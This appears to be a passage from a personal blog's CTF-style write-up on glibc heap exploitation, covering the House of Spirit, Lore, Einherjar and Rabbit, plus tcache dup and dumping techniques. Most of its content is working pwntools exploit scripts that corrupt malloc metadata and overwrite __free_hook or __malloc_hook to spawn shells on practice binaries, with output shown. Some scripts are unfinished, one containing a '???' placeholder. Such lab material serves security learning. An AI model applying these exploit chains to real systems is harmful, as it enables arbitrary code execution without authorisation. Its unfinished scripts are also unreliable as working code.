           ret = proc.recvline().strip()
           proc.recvuntil(b"> ")
           return ret
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       
       calloc(0x60-8) # chunk A
       calloc(0x60-8) # chunk B
       calloc(0x60-8) # chunk C
       calloc(0x60-8) # chunk D
       calloc(0x60-8) # chunk E
       calloc(0x60-8) # chunk F
       calloc(0x60-8) # chunk G
       calloc(0x60-8) # chunk H; protects other chunks against consolidation with top chunk
       edit(0, b"A"*0x58 + p8(0xc0 | 0b1)) # make chunk B completely overlap chunk C
       edit(3, b"D"*0x58 + p8(0xc0 | 0b1)) # make chunk E overlap chunk F
       free(1) # free chunk B
       # unsortedbin: [chunk B (+ C), size: 0xc0, fd: &main_arena.top, bk: &main_arena.top]
       calloc(0x60-8) # chunk I; service this request from the tail of the unsortedbin, causing it to be split in two
       # unsortedbin: [chunk C, size: 0x60, fd: &main_arena.top, bk: &main_arena.top]
       
       # leaks
       libc.address = u64(read(2)[:8]) - (libc.sym.main_arena+0x58)
       free(4)
       # unsortedbin: [chunk E (+ F), size: 0xc0, fd: &chunk_c, bk: &main_arena.bins[0]-0x10] -> [chunk C, size: 0x60, fd: &main_arena.bins[0]-0x10, bk: &chunk_e]
       heap = u64(read(2)[8:16]) - 0x180
       calloc(0x60-8) # chunk J
       # unsortedbin: [chunk E (+ F), size: 0xc0, fd: &main_arena.bins[0]-0x10, bk: &main_arena.bins[0]-0x10]
       calloc(0x60-8) # chunk K
       # unsortedbin: [chunk F, size: 0x60, fd: &main_arena.bins[0]-0x10, bk: &main_arena.bins[0]-0x10]
       
       # construct fake file
       fake_vtable = flat(
           p64(0),
           p64(0),
           p64(0xcafebabe),
           p64(libc.sym.system),
       )
       edit(10, b"K"*0x50 + b"/bin/sh\x00" + p8(0x68 | 0b1))
       edit(5, flat(
           p64(0),
           p64(libc.sym._IO_list_all-0x10), # chunk_f.bk
           p64(1), # _IO_write_base
           p64(2), # _IO_write_ptr
           fake_vtable,
       ))
       edit(6, flat(
           b"\x00"*(0xc0-8-0x68),
           p32(0), # _mode
       ))
       edit(7, flat(
           b"\x00"*(20-0x8-4),
           p64(heap+0x210), # vtable
       ))
       calloc(0x60-8) # chunk L; carry out unsortedbin attack
       
       proc.sendline(b"id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       == House of Spirit
       
       
       If    we    have    control    over    a    pointer    passed    to
       `free`,  we can craft  a fake chunk overlapping
       target memory for an arbitrary write.
       But  there  are  caveats:  especially  on  newer versions of Glibc,
       chunks  being freed are subject  to a bevy of integrity  checks, so
       our  fake chunk has  to be  nearly  indistinguishable  from  a real
       chunk.
       /* Little security check which won't hurt performance: the
          allocator never wrapps around at the end of the address space.
          Therefore we can exclude some size values which might appear
          here by accident or by "design" from some intruder.  */
       if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
           || __builtin_expect (misaligned_chunk (p), 0))
         malloc_printerr ("free(): invalid pointer");
       /* We know that each chunk is at least MINSIZE bytes in size or a
          multiple of MALLOC_ALIGNMENT.  */
       if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
         malloc_printerr ("free(): invalid size");
       /* Lightweight tests: check whether the block is already the
          top block.  */
       if (__glibc_unlikely (p == av->top))
         malloc_printerr ("double free or corruption (top)");
       /* Or whether the next chunk is beyond the boundaries of the arena.  */
       if (__builtin_expect (contiguous (av)
         && (char *) nextchunk
         >= ((char *) av->top + chunksize(av->top)), 0))
       malloc_printerr ("double free or corruption (out)");
       /* Or whether the block is actually not marked used.  */
       if (__glibc_unlikely (!prev_inuse(nextchunk)))
         malloc_printerr ("double free or corruption (!prev)");
       
       nextsize = chunksize(nextchunk);
       if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
       || __builtin_expect (nextsize >= av->system_mem, 0))
         malloc_printerr ("free(): invalid next size (normal)");
       
       free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
       
       /* consolidate backward */
       if (!prev_inuse(p)) {
         prevsize = prev_size (p);
         size += prevsize;
         p = chunk_at_offset(p, -((long) prevsize));
         if (__glibc_unlikely (chunksize(p) != prevsize))
           malloc_printerr ("corrupted size vs. prev_size while consolidating");
         unlink_chunk (av, p);
       }
       
       In short order, chunks must
       
           the heap
           cleared
           probably segfault)  or  `is_mmapped`  (will
           not add chunk to a freelist)
       
       === TODO Solve
       
       
       Because we have a heap leak, the simplest thing to do is pivot to a
       double free and then use  the  fastbin dup technique, but  alas, we
       can't use the simple version due to the quirk of addresses behaving
       differently under QEMU  (if we had more allocations  it might be  a
       different story).
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("house_of_spirit")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data, name):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.sendafter(b"chunk name: ", name)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"heap @ ")
       heap = int(proc.recvline(), 16)
       
       proc.sendafter(b"Enter your age: ", f"{0}".encode())
       proc.sendafter(b"Enter your username: ", b"Fred")
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       malloc(0x20-8, b"A", b"a"*0x8)
       malloc(0x20-8, b"B", b"b"*0x8)
       free(0)
       # 0x20 freelist: [chunk A] -> NULL
       free(1)
       # 0x20 freelist: [chunk B] -> [chunk A] -> NULL
       malloc(0x30-8, b"C", b"c"*0x8 + p64(heap+0x10))
       free(2)
       # 0x20 freelist: [chunk A] -> [chunk B] -> [chunk A] -> NULL
       malloc(0x20-8, p64(libc.sym.__free_hook-8), b"d"*0x8)
       # 0x20 freelist: [chunk B] -> [chunk A] -> &__free_hook-8
       malloc(0x20-8, b"E", b"e"*0x8)
       malloc(0x20-8, b"F", b"f"*0x8)
       # 0x20 freelist: &__free_hook-8
       malloc(0x20-8, p64(next(libc.search(b"/bin/sh\x00"))), b"g"*0x8)
       free(6)
       
       proc.sendline(b"id")
       print(proc.recvline())
       b'malloc(): memory corruption (fast)\n'
       
       == House of Lore
       
       
       This is a rather broad type of attack that  involves tampering with
       heap  metadata  to link  fake  chunks  into the different freelists
       (unsortedbins, smallbins, largebins) that malloc keeps track of.
       A fake chunk can then be used to service a request, usually leading
       to a leak or a write primitive.
       
       === Solve
       
       
       The challenge binary has a very straightforward UAF write bug which
       we can use to easily overwrite freelist pointers; the only trick is
       not failing malloc's corruption checks.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("house_of_lore")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       def edit(index, data):
           proc.send(b"3")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       proc.timeout = 0.5
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"heap @ ")
       heap = int(proc.recvline(), 16)
       
       ==== Unsortedbins
       
       
       This  proceeds similarly to the  unsortedbin  attack; allocate  one
       chunk and an  extra padding chunk to prevent consolidation with the
       top   chunk,   free   the   first  chunk,  and  edit  that  chunks'
       `bk`  pointer  to  insert  a fake  chunk in the
       unsortedbin.
       The size of the first  `malloc`​ed chunk should
       be   smaller   than   the  size   of   the  fake  chunk   so   that
       `malloc` will skip the tail of  the unsortedbin
       (the first chunk)  and  service  the request  with  the  fake chunk
       instead.
       
       I'm sure there's a way  to  pop a shell in this binary, but for the
       time being  I'm going to take the easy way  out  and  just focus on
       overwriting the target memory.
       <<lore-setup>>
       
       proc.sendafter(b"Enter your username: ", p64(0) + p64(0xa0 | 0b1) + p64(0xdeadbeefdeadbeef) + p64(elf.sym.user - 0x10))
       proc.recvuntil(b"> ")
       
       malloc(0x90-8) # chunk A
       malloc(0x90-8) # chunk B
       free(0)
       # unsortedbin: [chunk A] -> NULL
       edit(0, p64(0xdeadbeefdeadbeef) + p64(elf.sym.user))
       # unsortedbin: [fake chunk] <- [chunk A] -> 0xdeadbeefdeadbeef
       
       malloc(0xa0-8)
       edit(2, b"A"*(48-0x10) + b"pwned\x00")
       
       proc.send(b"4")
       proc.recvuntil(b"target: ")
       print(proc.recvline())
       
       ==== Smallbins
       
       
       When  `malloc`  traverses  the  unsortedbin  to
       service a request, it is simultaneously sorting the chunks it can't
       use into the small and large bins (depending on their size).
       
       So the strategy is  the same  as with linking into the unsortedbin,
       but  there's  an  additional  check  in the  codepath  that handles
       smallbins:
         idx = smallbin_index (nb);
         bin = bin_at (av, idx);
       
         if ((victim = last (bin)) != bin)
           {
             if (victim == 0) /* initialization check */
               malloc_consolidate (av);
             else
               {
                 bck = victim->bk;
       if (__glibc_unlikely (bck->fd != victim))
                   {
                     errstr = "malloc(): smallbin double linked list corrupted";
                     goto errout;
                   }
       
       So    there's   no    size    check,    but   the    fake   chunk's
       `bk`  pointer needs to point  to  a chunk whose
       `fd` pointer  points  back  to the  fake  chunk
       (whew).
       I chose to create another fake chunk on the heap for  this purpose,
       but there's no  PIE so we could just as easily put a new fake chunk
       right next to the original fake chunk.[^fn:3]
       <<lore-setup>>
       
       proc.sendafter(b"Enter your username: ", p64(0) + p64(0x90 | 0b1) + p64(heap) + p64(heap + 0x90))<<footnote(3)>>
       proc.recvuntil(b"> ")
       
       malloc(0x90-8) # chunk A
       malloc(0x90-8) # chunk B
       free(0)
       malloc(0xa0-8) # chunk C
       # 0x90 smallbin: [chunk A] -> NULL
       edit(0, p64(0xdeadbeefdeadbeef) + p64(elf.sym.user))
       # 0x90 smallbin: [fake chunk] <- [chunk A] -> 0xdeadbeefdeadbeef
       edit(1, p64(elf.sym.user))
       
       malloc(0x90-8)
       malloc(0x90-8)
       edit(4, b"A"*(48-0x10) + b"pwned\x00")
       
       proc.send(b"4")
       proc.recvuntil(b"target: ")
       print(proc.recvline())
       
       ==== Largebins
       
       
       Free chunks that don't fit in a fastbin or smallbin are sorted into
       a largebin (ignoring the tcache).
       Each  largebin  actually covers a  range  of bins, with larger bins
       covering  progressively  larger  ranges; in addition  to the linked
       list of chunks (of all sizes that  largebin  covers), each largebin
       has  another linked list which links at most one chunk of each size
       that bin covers.
       I like to think of  each largebin as having  an "inner" (skip list)
       and "outer" (regular) linked list, like this:
 (IMG) 
       
       Actually  linking in a  fake  chunk  is  straightforward;  the only
       hiccup  is  that the  chunk we're tampering with can't  be the last
       chunk in that bin, otherwise we'll never follow one of that chunk's
       corrupted pointers:
       /* Avoid removing the first entry for a size so that the skip
          list does not have to be rerouted.  */
       if (victim != last (bin)
        && chunksize_nomask (victim)
        == chunksize_nomask (victim->fd))
         victim = victim->fd;
       
       So  we need  to  link in another real chunk  with size less than or
       equal to the size of the first real chunk.
       <<lore-setup>>
       
       proc.sendafter(b"Enter your username: ", p64(0) + p64(0x410 | 0b1) + p64(elf.sym.user) + p64(elf.sym.user))
       proc.recvuntil(b"> ")
       
       malloc(0x410-8) # chunk A
       malloc(0x90-8)
       malloc(0x400-8) # chunk B
       malloc(0x90-8)
       free(0)
       free(2)
       malloc(0x420-8)
       # 0x400 largebin: [chunk A] <=> [chunk B]
       edit(0, p64(elf.sym.user))
       #                                 +----v
       # 0x400 largebin: [chunk A] -> [fake chunk] [chunk B]
       #                     ^-------------------------^
       
       malloc(0x410-8)
       edit(5, b"A"*(48-0x10) + b"pwned\x00")
       
       proc.send(b"4")
       proc.recvuntil(b"target: ")
       print(proc.recvline())
       
       == House of Einherjar
       
       
       This is a single null  byte  heap overflow; this allows  us to zero
       out the flags (notably `PREV_INUSE`) of an adjacent chunk
       on the heap.
       Consequently, we  can  force  backwards  consolidation  with a fake
       chunk, leading to an overlapping chunk primitive (which can  easily
       be pivoted to a UAF).
       
       === Solve
       
       
       Here  we abuse backwards  consolidation  to  create  a  fake  chunk
       overlapping the target data.
       We can clear the `PREV_INUSE` bit of the victim chunk and
       then free it, or alternatively free it first and  then use the null
       byte   overflow    to   decrease   the   freed    victim    chunk's
       `size`.
       
       A   cool   trick   is   that   instead  of   using   a   legitimate
       `size`  for  the  fake  chunk  (which  we can't
       calculate  in  this  instance because  we don't yet know  the  heap
       address), we can set it to 8.[^fn:4]
       Computing the  chunk  following a size 8 chunk results in  a  chunk
       whose `prev_size`  overlaps the  size 8 chunk's
       `size`, which passes the safe unlinking checks.
       #define unlink(AV, P, BK, FD) {                                               \
           if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
             malloc_printerr ("corrupted size vs. prev_size");                       \
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("house_of_einherjar")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.recvuntil(b"> ")
           malloc.index += 1
           return malloc.index - 1
       malloc.index = 0
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       def edit(index, data):
           proc.send(b"3")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       proc.timeout = 0.5
       
       proc.sendafter(b"Enter your username: ", p64(0) + p64(8) + p64(elf.sym.user) + p64(elf.sym.user) + p64(0))
       
       proc.recvuntil(b"heap @ ")
       heap = int(proc.recvline(), 16)
       proc.recvuntil(b"> ")
       
       chunk_A = malloc(0x90-8)
       chunk_B = malloc(0x100-8)
       edit(chunk_A, b"A"*(0x90-0x10) + p64((heap+0x90)-elf.sym.user))
       free(chunk_B)
       chunk_C = malloc(0x90-8) # serviced from the fake top chunk
       edit(chunk_C, b"C"*(0x20-8) + b"pwned\x00")
       
       proc.send(b"4")
       proc.recvuntil(b"target: ")
       print(proc.recvline())
       b'pwned\n'
       
       === TODO Challenge solve
       
       
       In       this      variant      we      don't      control      the
       `prev_size` field of the victim chunk.
       
       As    alluded     to    earlier,     we     can     decrease    the
       `size` of a freed chunk, service  an allocation
       from  it (this  does not update the `prev_size`
       and  `PREV_INUSE`  of  the  following  chunk  because  we
       tampered  with   `size`),  and  then  free  the
       adjacent chunk, leading to an  active chunk in the middle of a free
       chunk.
       We can then use this to read unsortedbin linked list pointers for a
       libc and heap leak.
       
       To  gain  code execution, I  initially tried using  an  unsortedbin
       attack to clobber `global_max_fast`  to  a very
       large value in  order for large  chunks to be qualified for fastbin
       insertion, and then used this to link a fake `0xf0` chunk
       overlapping `__malloc_hook`  into  the  fastbin
       freelist; however, due  to  poor  register and  stack control I was
       unable to meet the constraints of the one_gadgets in libc.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("poison_null_byte")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def calloc(size):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.recvuntil(b"> ")
           calloc.index += 1
           return calloc.index - 1
       calloc.index = 0
       
       def edit(index, data):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"3")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       def read(index):
           proc.send(b"4")
           proc.sendafter(b"index: ", f"{index}".encode())
           ret = proc.recvline()
           proc.recvuntil(b"> ")
           return ret
       
       proc = remote("localhost", 1337)
       proc.timeout = 140
       
       chunk_A = calloc(0x90-8)
       chunk_B = calloc(0x210-8)
       chunk_C = calloc(0x90-8)
       calloc(0x90-8) # padding
       free(chunk_B)
       edit(chunk_A, b"A"*(0x90-8)) # overflow LSB of chunk_B.size to 0x00
       chunk_E = calloc(0x100-8)
       chunk_F = calloc(0x100-8)
       free(chunk_E)
       free(chunk_C)
       chunk_G = calloc(0x1b0-8)
       
       free(chunk_A)
       # unsortedbin: [chunk A] -> [chunk E/F]
       libc.address = unpack(read(chunk_F)[0xb0:][:8]) - (libc.sym.main_arena+0x58)
       heap = unpack(read(chunk_F)[0xb0+8:][:8])
       
       calloc(0x1c0-8) # empty unsortedbin
       chunk_H = calloc(0xf0-8)
       free(chunk_H)
       # unsortedbin: [chunk H/F]
       edit(chunk_F, b"F"*0xa8 + p64(0xf1) + p64(0) + p64(libc.sym.global_max_fast-0x10))
       chunk_boop = calloc(0xf0-8) # unsortedbin attack
       free(chunk_boop)
       edit(chunk_F, b"F"*0xa8 + p64(0xf1) + p64(libc.sym.__malloc_hook-0x23))
       # 0x100 fastbin: [chunk ??] -> &__malloc_hook-0x23
       calloc(0xf0-8)
       chunk_I = calloc(0xf0-8)
       # 0x100 fastbin: [chunk I/F]
       one_gadget = libc.address + ???
       edit(chunk_I, b"\x00"*0x13 + p64(one_gadget))
       calloc(0x80-8) # trigger __malloc_hook
       
       proc.sendline(b"id")
       print(proc.recvall(timeout=0.5))
       
       The intended solve was to use the unsortedbin attack to create fake
       chunk metadata in front of `__free_hook`; while
       this is a  clever idea, this doesn't work under  QEMU as the MSB of
       libc addresses is `0xff`, not `0x7f`.
       
       == House of Rabbit
       
       
       This is a  technique that touches on many of the challenges covered
       thus  far  where  a  fake   chunk  "hops"   between  the  fastbins,
       unsortedbin and largebins.
       
       The steps are as follows:
       
       1.  Increase   `main_arena.system_mem`  to   at
           least  `0x80000`  (minimum   size   of  the   largest
           largebin) by  allocating  and  then freeing a  large chunk  (to
           raise      `mp_.mmap_threshold`),      then
           allocating another large chunk
       2.   Craft a fake  chunk with an attacker-controlled, editable
           size field (initially set  to `0x0`).  Link it into a
           fastbin (using e.g. fastbin dup)
       3.  Consolidate the  fastbins  into the  unsortedbin  by  freeing a
           large chunk (any chunk that gets consolidated with  this  chunk
           counts towards the size)
       4.   Set the fake chunk's size field to `0x80000` or
           higher
       5.  Allocate a chunk large enough to sort the largest largebin
       6.  Set the fake chunk's size to be large  enough to overlap target
           data (wrapping  around after `0xffffffffffffffff`  if
           target data is before the fake chunk)
       7.  Allocate a  chunk  with  a  size such that  the  fake chunk  is
           remaindered into  a much smaller chunk that overlaps the target
           data
       8.  Allocate a chunk with size equal to  the chunk remaindered from
           the fake chunk
       9.  Profit
       
       === Solve
       
       
       Here  we're using  a  double free  to link  our fake  chunk into  a
       fastbin, but  we could skip  steps 2–4 if we were able  to directly
       link a size `0x80000` fake chunk into the unsortedbin.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF(bin)
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
           malloc.index += 1
           return malloc.index - 1
       malloc.index = 0
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       def edit_age(data):
           proc.send(b"3")
           proc.sendafter(b"age: ", f"{data}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       proc.timeout = 150
       
       fastbin_consolidation_threshold = 0x10000
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.sendafter(b"Enter your age: ", f"{0 | 0b1}".encode())
       proc.recvuntil(b"> ")
       
       chunk_A = malloc(0x80000-8, b"A")
       free(chunk_A) # increase mmap_threshold
       chunk_B = malloc(0x80000-8, b"B") # increase main_arena.system_mem
       free(chunk_B)
       
       chunk_C = malloc(0x20-8, b"C")
       chunk_D = malloc(0x20-8, b"D")
       chunk_E = malloc(fastbin_consolidation_threshold-8, b"E")
       free(chunk_C)
       free(chunk_D)
       free(chunk_C)
       chunk_F = malloc(0x20-8, p64(elf.sym.user))
       free(chunk_E) # consolidate fastbins
       
       edit_age(0x80000 | 0b1)
       chunk_G = malloc(0x80010-8, b"G") # sort bin[126]
       free_hook_offset = (libc.sym.__free_hook-0x20) - elf.sym.user
       edit_age((free_hook_offset + 0x98) | 0b1)
       
       chunk_H = malloc(free_hook_offset, b"/bin/sh\x00")
       malloc(0x90-8, p64(0) + p64(libc.sym.system))
       free(chunk_H)
       
       proc.sendline(b"id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       ==== No fastbins
       
       
       This is the same challenge, except we can no longer request fastbin
       sized chunks.
       
       I initially tried setting the size of the fake chunk such that when
       it  was remaindered,  the  remaindered  chunk's  size  field  would
       overlap  with   `__free_hook`  and  be  set  to
       `libc.sym.system`.
       However,   although    `__free_hook`   can   be
       overwritten  this  way,  the  program  will  segfault   immediately
       afterwards  when  it  tries   to  access  a  value  just  past  the
       remaindered chunk.
       # ...
       
       # step 6: allocate a chunk large enough that remaindering it will overwrite the __free_hook with a target value
       free_hook_offset = (libc.sym.__free_hook-0x10) - elf.sym.user
       edit_age(free_hook_offset + (libc.sym.do_system+1) + 0x7)
       
       chunk_M = malloc(free_hook_offset, b"/bin/sh\x00") # __free_hook = size of remaindered chunk
       # CRASH! (ノ°益°)ノ
       
       # free(chunk_M)
       # proc.sendline(b"id")
       # print(proc.recvline())
       
       Instead  I   targeted  `__after_morecore_hook`,
       which thankfully satisfies the conditions for a one_gadget.
       # ...
       
       # step 6: allocate a chunk large enough such that remaindering it will create a free chunk overlapping __after_morecore_hook
       after_morecore_offset = (libc.sym.__after_morecore_hook - 0x20) - elf.sym.user
       edit_age((after_morecore_offset + 0xa0) | 0b1)
       
       malloc(after_morecore_offset, b"M")
       one_gadget = libc.address + 0x3ff5e
       malloc(0x90-8, p64(one_gadget))
       
       proc.timeout = 0.5
       malloc(0x60010-8, b"") # trigger __after_morecore_hook
       
       proc.sendline(b"id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       == Tcache dup
       
       
       From this point on, glibc  ≷ 2.26 will be compiled  with tcache
       enabled
       
       This is essentially the same as the fastbin dup, except even easier
       as `free`  doesn't check  if  the  chunk  being
       freed is already at  the  head  of  the  tcachebin,  and there  are
       absolutely no sanity checks on what constitutes a valid fake chunk.
       
       === Solve
       
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("tcache_dup")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
           malloc.index += 1
           return malloc.index - 1
       malloc.index = 0
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       proc.timeout = 0.5
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       chunk_A = malloc(0x20-8, b"A")
       free(chunk_A)
       free(chunk_A)
       malloc(0x20-8, p64(libc.sym.__free_hook))
       chunk_C = malloc(0x20-8, b"/bin/sh\x00")
       malloc(0x20-8, p64(libc.sym.system))
       free(chunk_C)
       
       proc.sendline(b"id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       == Tcache dumping
       
       
       When servicing  a request  from  a fastbin, malloc will attempt  to
       move as  many remaining  chunks in that fastbin  that will fit into
       the corresponding tcachebin.
       
       === Solve
       
       
       There's now  a check in  `free` that  ensures a
       chunk being  freed  isn't already in  the  target tcachebin,  so we
       can't just do a simple tcache dup.
       However, chunks  that are  dumped from a fastbin to a tcachebin are
       not  subject  to this  check,  so  if  we  can  corrupt  a  fastbin
       `fd` we should be in good shape.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("tcache_dup_2.31")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
           malloc.index += 1
           return malloc.index - 1
       malloc.index = 0
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       proc.timeout = 0.5
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       # fill tcache
       for i in range(7):
           malloc(0x20-8, f"{chr(ord('A')+i)}".encode())
       chunk_H = malloc(0x20-8, b"H")
       
       for i in range(7):
           free(i)
       free(chunk_H)
       # 0x20 fastbin: [chunk H]
       malloc(0x20-8, b"I")
       free(chunk_H)
       # 0x20 tcachebin: [chunk H] -> ...
       
       malloc(0x20-8, p64(libc.sym.__free_hook-0x10))
       # 0x20 fastbin: [chunk H] -> &__free_hook
       for i in range(6):
           malloc(0x20-8, f"{chr(ord('K')+i)}".encode())
       chunk_R = malloc(0x20-8, b"/bin/sh\x00") # dump rest of 0x20 fastbin to 0x20 tcachebin
       malloc(0x20-8, p64(libc.sym.system))
       free(chunk_R)
       
       proc.sendline(b"id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       === Challenge solve
       
       
       Normally we could just free a chunk a bunch of times to fill up the
       tcache, but we have a limited number of frees: what to do?
       If we  were dealing with other bins we'd be  in a tough  situation,
       but  the tcache  stores  its  metadata on  the heap,  which  is our
       domain!
       
       We'll do most  of our work  in a  single victim chunk, which  we'll
       have    two    handles    to:    one    "alive"    pointer    (with
       `in_use=1`)  that  we  can read  from  and  one
       "dead" pointer we can continuously call free on.
       After setting that up we can leak the heap with a tcache dup, which
       results in our victim chunk pointing to itself.
       Once we do that we can overwrite this pointer with the start of the
       `tcache`        struct         and         call
       `malloc`  twice  to  get a  chunk that overlaps
       `tcache`.
       We  use  this  chunk to  artificially  mark  the  `0x240`
       tcachebin as being full (taking  care  to set the head pointer back
       to `tcache`  so we  can edit  it  again in  the
       future); this allows  us to free a chunk into  the  unsortedbin and
       get a libc leak.
       Armed with our  leaks, we can now request another `0x240`
       chunk to edit `tcache` again,  and this time we
       set the head  of the `0x240` tcachebin  to point  to  the
       `__free_hook`.
       
       An allocation and a  `free` later and we have a
       shell!
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("tcache_troll")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
           malloc.index += 1
           return malloc.index - 1
       malloc.index = 0
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       def read(index):
           proc.send(b"3")
           proc.sendafter(b"index: ", f"{index}".encode())
           ret = proc.recvline()[:-1]
           proc.recvuntil(b"> ")
           return ret
       
       proc = remote("localhost", 1337)
       proc.timeout = 0.5
       
       chunk_A = malloc(0x240-8, b"A") # "free" handle
       chunk_B = malloc(0x20-8, b"/bin/sh\x00") # padding
       free(chunk_A)
       chunk_C = malloc(0x240-8, b"C") # "read" handle
       free(chunk_A)
       free(chunk_A)
       # 0x240 tcachebin: [chunk A] -> [chunk A] -> ...
       
       heap = unpack(read(chunk_C)) - (0x250+0x10)
       
       malloc(0x240-8, p64(heap+0x10))
       # 0x240 tcachebin: [chunk A] -> [&heap+0x10]
       malloc(0x240-8, b"DDDDDDDDDDD")
       # 0x240 tcachebin: [&heap+0x10]
       malloc(0x240-8, b"\x00"*34 + b"\x07" + b"\x00"*29 + p64(0)*34 + p64(heap+0x10))
       # 0x240 tcachebin: [&heap+0x10] (marked as full)
       free(chunk_A)
       # unsortedbin: [chunk A]
       libc.address = unpack(read(chunk_C)) - (libc.sym.main_arena+0x60)
       
       malloc(0x240-8, b"\x00"*34 + b"\x07" + b"\x00"*29 + p64(0)*34 + p64(libc.sym.__free_hook))
       # 0x240 tcachebin: [&__free_hook] (marked as full)
       malloc(0x240-8, p64(libc.sym.system))
       free(chunk_B)
       
       proc.sendline(b"id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       [^fn:1]: Note that non-fastbin chunks have additional metadata; see
       the Glibc explanation [5] for more info.
       [^fn:2]: This is one of the OG heap exploits, used all the way back
       in 2000 to pwn Netscape [6].
       [^fn:3]:    We    could     also    set    this    fake     chunk's
       `fd` and `bk`  pointers  to
       point    to    itself    instead    of    constructing    a    fake
       `victim->bk->fd` on the heap.
       [^fn:4]: Note that it must be exactly 8, i.e. the AMP flags must be
       cleared
       
       References:
 (HTM)   [1] HeapLAB
 (HTM)   [2] Malloc Maleficarum
 (HTM)   [3] QEMU/Rosetta
 (HTM)   [4] House of Orange
 (HTM)   [5] Glibc explanation
 (HTM)   [6] pwn Netscape
       >=================================================================<
       
 (DIR) Blog
 (DIR) Writeups
 (DIR) jp
       
       copyright 2026 George Huebner
